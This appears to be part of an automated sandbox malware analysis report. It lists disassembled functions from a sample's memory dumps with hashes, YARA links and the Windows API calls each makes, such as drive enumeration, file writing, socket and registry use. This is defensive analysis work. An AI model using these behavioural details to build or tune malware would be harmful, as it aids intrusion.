                                                                                                                                                                                                              • Instruction ID: 4f3c1c4e20a48b5ab4294df6c4a04a1512b0e1004afaefdaafabc592cbf6ec2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 039ba6ad8b911574e6c5fa99f210a85cdf914ec6e900127014e58647964caa2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BA18C7191025A9FEB21CB28CD94FFF7768EF82300F5042D5EB49DB181D670AA46CBA0
                                                                                                                                                                                                              Function 012E2D98 Relevance: 6.5, APIs: 5, Instructions: 228COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 3435927b5c40170d6a93397bb595ea62ac49ca410f73f76dac9a50fe402705bb
                                                                                                                                                                                                              • Instruction ID: d8e001aa21e247ef87dd7b1e292789af1e6aaa7d96464388976b8a6531204eea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3435927b5c40170d6a93397bb595ea62ac49ca410f73f76dac9a50fe402705bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D816E71A2021ADBDF25CF4CC448BAABBF9FF48314F980518EA06A7340D771E951CB91
                                                                                                                                                                                                              Function 012AEEE8 Relevance: 6.4, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Desk$\$o$p$t
                                                                                                                                                                                                              • API String ID: 0-1766595857
                                                                                                                                                                                                              • Opcode ID: d86b431d1c05877a20477e7054f33b23480595be5d845d38dfa79bad9db3056e
                                                                                                                                                                                                              • Instruction ID: 0e0bc8431ab3e121b48597ac21b8a79485632d84189c08e193a1d7a93f738ee5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86b431d1c05877a20477e7054f33b23480595be5d845d38dfa79bad9db3056e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C041CC7191029B4FFF228B28CD247FE77A9EF42301F5041E4DB8AD7082D634AA468B51
                                                                                                                                                                                                              Function 013141D0 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 013141EB
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 013141FD
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 0131420F
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 01314221
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 0131422B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 088f0bd6fada9f734e238dc11f470a7d1774c1ba94ab3c528181d15105e5bff0
                                                                                                                                                                                                              • Instruction ID: 67b0c632f788d4427d3a1091fe34f6eceed4bdfaaa1d40c2311de3c10a3bd286
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 088f0bd6fada9f734e238dc11f470a7d1774c1ba94ab3c528181d15105e5bff0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E60192F2A017811BE734DFAD98D048BBED56D45308359883DD2DE83A08D331F8899711
                                                                                                                                                                                                              Function 013113A0 Relevance: 6.3, APIs: 4, Instructions: 287COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(000000FF,?,?,?,?,00000000,?,?,?), ref: 013113F9
                                                                                                                                                                                                              • realloc.MSVCRT(?,000000FF,?,?,?,?,00000000,?,?,?), ref: 01311405
                                                                                                                                                                                                              • malloc.MSVCRT(00000000,?,?,?,?,00000000,?,?,?), ref: 013114AC
                                                                                                                                                                                                              • realloc.MSVCRT(?,00000000,?,?,?,?,00000000,?,?,?), ref: 013114B8
                                                                                                                                                                                                                • Part of subcall function 01310EA0: __WSAFDIsSet.WS2_32(?,?), ref: 01310F50
                                                                                                                                                                                                                • Part of subcall function 01310EA0: closesocket.WS2_32(?), ref: 01310F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              • Opcode ID: 74ac0c5116f5d12fb541fe6d7c0f0721cb726456e15ceb2cb58e792190fa6e40
                                                                                                                                                                                                              • Instruction ID: c28ee1b665fb0ea2562c2c04dd1a2acab4e31839ac0fa223cc622d6159bb6c6b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74ac0c5116f5d12fb541fe6d7c0f0721cb726456e15ceb2cb58e792190fa6e40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60B1C772A046068FCB18CF28D990AE57BB5FF94315F0881B9ED1D9F34AD775A901CBA0
                                                                                                                                                                                                              Function 0130E45B Relevance: 6.1, APIs: 4, Instructions: 126fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000004), ref: 0130E510
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 0130E56F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFilefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1298414175-0
                                                                                                                                                                                                              • Opcode ID: 358001167fd3aa46de17ee4df3a07cd9a806fb200704d6ac4c9f0284f8dde3ea
                                                                                                                                                                                                              • Instruction ID: 28451abfc7503106d34035d5d5ccb7292f15065a7873464d11625685ea23f8ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 358001167fd3aa46de17ee4df3a07cd9a806fb200704d6ac4c9f0284f8dde3ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB419731B046094BEB32CF7CAC647EA7FE09B85318F1085BAEA5AD72C2DA355005C7A1
                                                                                                                                                                                                              Function 0130E0FB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0130E119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0130E15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0130E1D2
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0130E1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2496910992-0
                                                                                                                                                                                                              • Opcode ID: b1cb2112fc231192ffb1cf01d989f63bf8d6939fda063d95eeaa8f6473cd588d
                                                                                                                                                                                                              • Instruction ID: 6cd0b1da5514dca4daba8acc65d7685ffc24bfb8e4e3a9f44dba282a121354a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1cb2112fc231192ffb1cf01d989f63bf8d6939fda063d95eeaa8f6473cd588d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E31497270024E8FDB11CEE8E8946FE7BE8EB45315F1409B6EA4587281E7318616C7E2
                                                                                                                                                                                                              Function 012F8220 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • fseek.MSVCRT(?,00000000,00000000), ref: 012F82AB
                                                                                                                                                                                                              • fwrite.MSVCRT(00000003,00000020,00000001), ref: 012F82C2
                                                                                                                                                                                                              • fwrite.MSVCRT(00000003,00000020,?,00000000), ref: 012F82D1
                                                                                                                                                                                                              • fwrite.MSVCRT(?,00000001,00000001), ref: 012F82F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              • Opcode ID: 92208f68fdb5f2a85eb4d4b334cad2d81ed16a2daee7d8aaff8a7f9ec6193baf
                                                                                                                                                                                                              • Instruction ID: 54b22c8e983eaf3cbfe10567425d4e98e2bdbcce16bcd2448d4c2c9baf64f504
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92208f68fdb5f2a85eb4d4b334cad2d81ed16a2daee7d8aaff8a7f9ec6193baf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4221AC70A417469FD720CFA8C841BAAFBF5EF98700F04856DE585A7281E2B4BA408B90
                                                                                                                                                                                                              Function 012E7D39 Relevance: 6.1, APIs: 4, Instructions: 78memoryregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7DAD
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7DB4
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,?,?), ref: 012E7DC3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E7DF3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2501364573-0
                                                                                                                                                                                                              • Opcode ID: b2e143a4ae18f413964f60fc5e266314c4e7e4027802f9be1d5fdc46a8abed08
                                                                                                                                                                                                              • Instruction ID: 2e489d0b71fe78ad6acc173827472ed48ef2a37cdfecf450f4b472e4cd9db70e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2e143a4ae18f413964f60fc5e266314c4e7e4027802f9be1d5fdc46a8abed08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3215E3392005A4FDB36AA78989CAFA7BD9EB59300F9406BCE785C7141D7718D4487D0
                                                                                                                                                                                                              Function 012F2370 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000206), ref: 012F2392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 012F239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 012F23B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000), ref: 012F23D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              • Opcode ID: 534c375f3750ffef8f0cc4063dd1286661ef751d77fb023f60cec96bbfc4cced
                                                                                                                                                                                                              • Instruction ID: 5894c963116eea169ab2319fd9b3dac4546f7f2cc3c620d3ea2c1972f3a18f84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 534c375f3750ffef8f0cc4063dd1286661ef751d77fb023f60cec96bbfc4cced
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F012273B103246BE720AE6CAC88AA7F76CEB01610F00423EEF09E3101E970D95487A0
                                                                                                                                                                                                              Function 01309B30 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,00000000,61C5C0CB,?,012FC04F,00000000,00000000), ref: 01309B43
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,012FC04F,00000000,00000000), ref: 01309B59
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000008,00004070,00000001,00000000,775B5CE0,?,012F3CE8,?), ref: 01309793
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapAlloc.KERNEL32(00000000,?,012F3CE8,?), ref: 01309796
                                                                                                                                                                                                                • Part of subcall function 01309780: memset.MSVCRT(00000000,00000000,00004070,?,012F3CE8,?), ref: 013097AB
                                                                                                                                                                                                                • Part of subcall function 01309780: CreateFileA.KERNEL32(012F3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,012F3CE8,?), ref: 01309802
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309825
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapValidate.KERNEL32(00000000,?,012F3CE8,?), ref: 01309828
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309834
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapFree.KERNEL32(00000000,?,012F3CE8,?), ref: 01309837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,012FC04F,00000000,00000000), ref: 01309B85
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                                • Part of subcall function 01309910: _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                                • Part of subcall function 01309910: FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFreeProcess$FileLocalVirtualwsprintf$CreateFindFirstValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 61C5C0CB
                                                                                                                                                                                                              • API String ID: 4264910087-651512440
                                                                                                                                                                                                              • Opcode ID: e1257bb41462af8c08d56127a58340affd594f02a07ae4bc624f91c45dfbf575
                                                                                                                                                                                                              • Instruction ID: 5e65c6376137966db8fba935af310838144cc90ec2ac8350686b56cad6299cb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1257bb41462af8c08d56127a58340affd594f02a07ae4bc624f91c45dfbf575
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F0E97638171537E2327A6D9C15FEB7B5CABC1F78F100025FB08AA2C1C9A1E54183B4
                                                                                                                                                                                                              Function 012E4090 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,012E432B,?), ref: 012E409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012E432B,?), ref: 012E40A3
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000014,%d.%d.%d.%d,?,?,?,?,?,012E432B,?), ref: 012E40E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              • Opcode ID: 95dbf126cbaff49515262f516c9619c9b10cd05d1ca837147c94f9cad581c92c
                                                                                                                                                                                                              • Instruction ID: 9f79fd902a004f7b23f9bc8e0c2870208f4db5da87395201bae648245fa365fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95dbf126cbaff49515262f516c9619c9b10cd05d1ca837147c94f9cad581c92c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F03CB1940724AFD370DF6A9845BA6BFF8EF0C711F00852EF699C6641E23596048BA4
                                                                                                                                                                                                              Function 012FB890 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,012F8BDE,00000000,?,?,?,?,?,?), ref: 012FB8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB740,00000000,00000000,00000000,?,?,012F8BDE,00000000,?,?,?,?,?,?), ref: 012FB8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,012F8BDE,00000000), ref: 012FB8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,012F8BDE,00000000), ref: 012FB8E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              • Opcode ID: cfba48c11b300bc49d2f1ce182372fc9aecfad54336abe56e035b46ebb2360a5
                                                                                                                                                                                                              • Instruction ID: 9c58ae8a5e6c349f2dd8f07ef368eb0f1c237cebd942f41776d5f054b551e301
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfba48c11b300bc49d2f1ce182372fc9aecfad54336abe56e035b46ebb2360a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F05475654305BBE7309FA9DC0AF9ABBACAB05B01F10006CFB05E61C5D7B0A6009764
                                                                                                                                                                                                              Function 012FF840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              • Opcode ID: 57f91a12d671a8df08cf14d6c3565ffc39f444ced2fc850d7fa84692e9aa09c6
                                                                                                                                                                                                              • Instruction ID: d567f44caf1d09adb6e8492851765afe636d9288cbb79375a99267fbabefbb16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f91a12d671a8df08cf14d6c3565ffc39f444ced2fc850d7fa84692e9aa09c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 634189332242274BDB358E2C87552BAF366EB85214F4842BDDB86CB765F761A941C780
                                                                                                                                                                                                              Function 012E4100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(774D3550,00000000,012E5637), ref: 012E4102
                                                                                                                                                                                                              • _snprintf.MSVCRT(0133DAA0,00000104,%dd %dh %dm), ref: 012E4166
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              • Opcode ID: 8123a1c4e7ac6533fed5454f8ca8f108f43634f7ec07fefbe805f84b2b557155
                                                                                                                                                                                                              • Instruction ID: 8029d11946993bbe2e8702814cb4d0f0c2cf24e18ebc0c36ef642da937e4215d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8123a1c4e7ac6533fed5454f8ca8f108f43634f7ec07fefbe805f84b2b557155
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF0EC32B0111417E32CA81EAD0AABA998B87C832178CC23CFD0ACF3DCDCA49D1242C4
                                                                                                                                                                                                              Function 012FEB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: memset.MSVCRT ref: 012FE6CF
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: memset.MSVCRT ref: 012FE6F1
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?,?,00000000,0000040C,00000103), ref: 012FE706
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetErrorMode.KERNEL32(00000001), ref: 012FE71F
